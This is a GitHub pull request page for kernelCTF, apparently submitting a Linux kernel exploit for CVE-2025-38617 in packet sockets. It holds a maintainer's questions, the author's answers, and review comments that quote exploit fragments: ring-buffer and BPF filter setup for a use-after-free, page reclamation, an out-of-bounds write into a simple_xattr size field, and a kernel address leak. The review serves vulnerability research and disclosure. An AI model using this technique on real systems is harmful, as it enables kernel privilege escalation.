Skip to content

Add kernelCTF CVE-2025-38617_mitigation_cos#339

Open
quanggle97 wants to merge 34 commits intogoogle:masterfrom
quanggle97:master
Open

Add kernelCTF CVE-2025-38617_mitigation_cos#339
quanggle97 wants to merge 34 commits intogoogle:masterfrom
quanggle97:master

Conversation

@quanggle97
Copy link
Contributor

No description provided.

@quanggle97
Copy link
Contributor Author

@koczkatamas Pull request is ready for reviewing

Copy link
Collaborator

@koczkatamas koczkatamas left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hey!

Your exploit code and writeup is very long and although explains a lot of details, it's very hard to follow or get a quick understanding what's happening exactly.

So I have a few questions:

Q1. Which kernel structures (struct XXX within the kernel source) are freed and then used due the UAF? Which fields of those objects are used (those which are relevant for the exploitation)?

Q2. What object did you spray pages_order2_read_primitive to allocate in the space of the UAF'd object from Q1?

Q3. My understanding is that you can overwrite a simple_xattr's structure size field via the original vulnerability in pages_order2_read_primitive.

Let's say simple_xattr looks like this:

struct simple_xattr {
        struct rb_node             rb_node;              /*     0    24 */
        char *                     name;                 /*    24     8 */
        size_t                     size;                 /*    32     8 */
        char                       value[];              /*    40     0 */
};

What is the effect of the vulnerability you are using? Out-of-bounds write of 8 bytes? How / where in the source code exactly do you set the right offset (the offset of the size field)? What cache (in case of SLAB) or order of pages (in case of BUDDY) are you writing from to which cache/pages?

Where do you set the length of the write? (Is it filter[MAX_FILTER_LEN - 1].k = sizeof(size_t);?)

If you'd like to only overwrite 8 bytes, why don't you send a 8-byte long packet? To get into the right cache?

Are the other fields (like rb_node, name, or value) overwritten or your primitive allows you precise only 8-byte overwrite of the size field?

What other constraints do you have for this primitive? Can you choose any offset and size, or there are any restrictions?

Q4. From which object's which field do you leak leaked_content_simple_xattr_kernel_address?

Do I understand correctly that you reuse the original OOB overwrite primitive to overwrite a pgv[] order-2 page to be able to mmap the address of the leaked_content_simple_xattr and modify its values to get the simple_xattr_read_write primitive?

Which fields do you use for the RW purpose? name or value+size? Where I see setting these fields in the source code?

Q5. Why do you need the abr_page_read_write_primitive when you could also RW with the simple_xattr_read_write_primitive?

rx_ring.tp_block_nr = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16;
rx_ring.tp_frame_size = PAGES_ORDER3_SIZE;
rx_ring.tp_frame_nr = rx_ring.tp_block_size / rx_ring.tp_frame_size * rx_ring.tp_block_nr;
rx_ring.tp_sizeof_priv = 16248;
Copy link
Collaborator

@koczkatamas koczkatamas Feb 27, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Is this the place you are adjusting the right offset to be written? How do you calculate this offset exactly? Please use struct sizes and field offsets in the calculation to understand how this works.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Q1: The ring buffer is freed (represented by struct pgv which is basically an array of kernel pointers)
Q2: Another ring buffer is used for reclamation purpose.
Q3: The vuln allows me to perform oob write with control size and control offset. How the exploit control the offset I think i described in UAF section. The packet is allocated from function packet_sendmsg_spkt() which has a check inside dev_validate_header() that doesn't allow packet with 8 bytes len. I specifically chose to only the size field. I can build the generic page overflow primitive but I decided just to pick the number fit my strategy.
Q4: Yes
Q5: The simple_xattr_read_write_primitive only allows us to perform read/write on that struct simple_xattr object not abr read/write. I just want to keep the simple_xattr_read_write_primitive alive. If we free that struct simple_xattr object, what if we fail to reclaim its with something we want ?

Comment on lines 1473 to 1505
struct tpacket_req3 tx_ring = {};
tx_ring.tp_block_size = PAGES_ORDER1_SIZE;
tx_ring.tp_block_nr = 1;
tx_ring.tp_frame_size = PAGES_ORDER1_SIZE;
tx_ring.tp_frame_nr = tx_ring.tp_block_size / tx_ring.tp_frame_size * tx_ring.tp_block_nr;

struct tpacket_req3 rx_ring = {};
rx_ring.tp_block_size = PAGES_ORDER3_SIZE;
rx_ring.tp_block_nr = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16;
rx_ring.tp_frame_size = PAGES_ORDER3_SIZE;
rx_ring.tp_frame_nr = rx_ring.tp_block_size / rx_ring.tp_frame_size * rx_ring.tp_block_nr;
rx_ring.tp_sizeof_priv = 16248;
rx_ring.tp_retire_blk_tov = USHRT_MAX;

struct sock_filter filter[MAX_FILTER_LEN] = {};
for (int i = 0; i < MAX_FILTER_LEN - 1; i++) {
filter[i].code = BPF_LD | BPF_IMM;
filter[i].k = 0xcafebabe;
}

filter[MAX_FILTER_LEN - 1].code = BPF_RET | BPF_K;
filter[MAX_FILTER_LEN - 1].k = sizeof(void *);

primitive->victim_packet_socket_config = victim_packet_socket_config_create(
(struct __kernel_sock_timeval){ .tv_sec = 1 }, // sndtimeo
(struct sockaddr_ll){ .sll_family = AF_PACKET, .sll_ifindex = If_nametoindex(DUMMY_INTERFACE_NAME), .sll_protocol = htons(ETH_P_ALL) }, // addr
tx_ring, // tx_ring
rx_ring, // rx_ring
1, // packet_loss
TPACKET_V3, // packet_version
30, // packet_reserve
filter // filter
);
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Significant code duplication for setting up packet socket configuration rings and BPF filters.

Recommendation: Extract the common packet socket configuration logic into a dedicated utility function.

AI-suggested fix (do not apply blindly, but can be helpful for inspiration):

primitive->victim_packet_socket_config = util_create_shared_packet_socket_config();

Read more about this violation in the 'Code duplication' section of the style guide.

This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Like i commented above, I don't build generic page overflow primitive. Part of the packet socket configuration is used to build that page overflow primitive. For example, if i want to perform PAGES_ORDER3_SIZE overflow, i will chose the buffer size of victim ring buffer to have size PAGES_ORDER4_SIZE and the buffer size of reclamation ring buffer to have size PAGES_ORDER3_SIZE. packet_reserve can be modified to affect the overwrite offset to. I think i described these on the UAF section.


alloc_pages(overwritten_pg_vec_packet_socket, MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2, PAGE_SIZE);
void *mem = mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_name_packet_socket, 0);
void *mem1 = mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_packet_socket, 0);
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Variable name mem1 is too generic and similar to mem.

Recommendation: Use a descriptive name representing the specific mapping, such as fake_xattr_mem.

AI-suggested fix (do not apply blindly, but can be helpful for inspiration):

void *fake_xattr_mem = mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_packet_socket, 0);

Read more about this violation in the 'Naming conventions' section of the style guide.

This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

At that point, these addresses are freed and the expectation is struct pgv object is successfully reclaim on one of these addresses. I kept mem and mem1 to represent right now, the exploit still not know what actually in these addresses.


bool pages_order2_read_primitive_build_leaked_simple_xattr(struct pages_order2_read_primitive *pages_order2_read_primitive)
{
void *tmp = pages_order2_read_primitive_trigger(pages_order2_read_primitive);
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Too generic variable name 'tmp' used for primitive output.

Recommendation: Rename the variable to reflect its contents, such as leaked_data.

AI-suggested fix (do not apply blindly, but can be helpful for inspiration):

void *leaked_data = pages_order2_read_primitive_trigger(pages_order2_read_primitive);

Read more about this violation in the 'Naming conventions' section of the style guide.

This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Done.

Comment on lines 1447 to 1453
if ((next & (PAGES_ORDER2_SIZE - 1)) == 0) {
pages_order2_read_primitive->overflowed_simple_xattr_kernel_address = next;
pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address = pages_order2_read_primitive->overflowed_simple_xattr_kernel_address + (leaked_simple_xattrs_idx + 1) * PAGES_ORDER2_SIZE;
} else if ((prev & (PAGES_ORDER2_SIZE - 1)) == 0) {
pages_order2_read_primitive->overflowed_simple_xattr_kernel_address = prev;
pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address = pages_order2_read_primitive->overflowed_simple_xattr_kernel_address + (leaked_simple_xattrs_idx + 1) * PAGES_ORDER2_SIZE;
}
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Logic to set kernel address variables is duplicated verbatim across if/else blocks.

Recommendation: Refactor the logic to determine the valid address first, then assign the variables in a single shared block.

AI-suggested fix (do not apply blindly, but can be helpful for inspiration):

u64 valid_addr = ((next & (PAGES_ORDER2_SIZE - 1)) == 0) ? next : prev; pages_order2_read_primitive->overflowed_simple_xattr_kernel_address = valid_addr; pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address = valid_addr + (leaked_simple_xattrs_idx + 1) * PAGES_ORDER2_SIZE;

Read more about this violation in the 'Code duplication' section of the style guide.

This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Done.

rx_ring.tp_block_nr = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16;
rx_ring.tp_frame_size = PAGES_ORDER3_SIZE;
rx_ring.tp_frame_nr = rx_ring.tp_block_size / rx_ring.tp_frame_size * rx_ring.tp_block_nr;
rx_ring.tp_sizeof_priv = 16248;
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Usage of an unexplained magic number.

Recommendation: Replace the magic number with a descriptive macro or add an explanatory comment.

AI-suggested fix (do not apply blindly, but can be helpful for inspiration):

    rx_ring.tp_sizeof_priv = TPACKET_SIZEOF_PRIV_VALUE; /* 16248 */

Read more about this violation in the 'Name and/or comment numeric constants' section of the style guide.

This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Again, i don't build generic page overflow function. If i have to use a descriptive macro, it will look like TPACKET_SIZEOF_PRIV_VALUE_TO_KEEP_THE_UNCONTROLLED_WRITE_DATA_NEAR_THE_END_OF_RECLAMATION_BUFFER_FROM_RING_BUFFER ...

struct sock_filter filter[MAX_FILTER_LEN] = {};
for (int i = 0; i < MAX_FILTER_LEN - 1; i++) {
filter[i].code = BPF_LD | BPF_IMM;
filter[i].k = 0xcafebabe;
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Unexplained magic number used in BPF filter.

Recommendation: Define the magic number as a macro or document its irrelevance.

AI-suggested fix (do not apply blindly, but can be helpful for inspiration):

        filter[i].k = BPF_PLACEHOLDER_VALUE; /* 0xcafebabe */

Read more about this violation in the 'Name and/or comment numeric constants' section of the style guide.

This comment is AI-generated. Although it was manually checked, it can still contain mistakes, please double-check it and feel free to push back if you think it's wrong.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Done.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants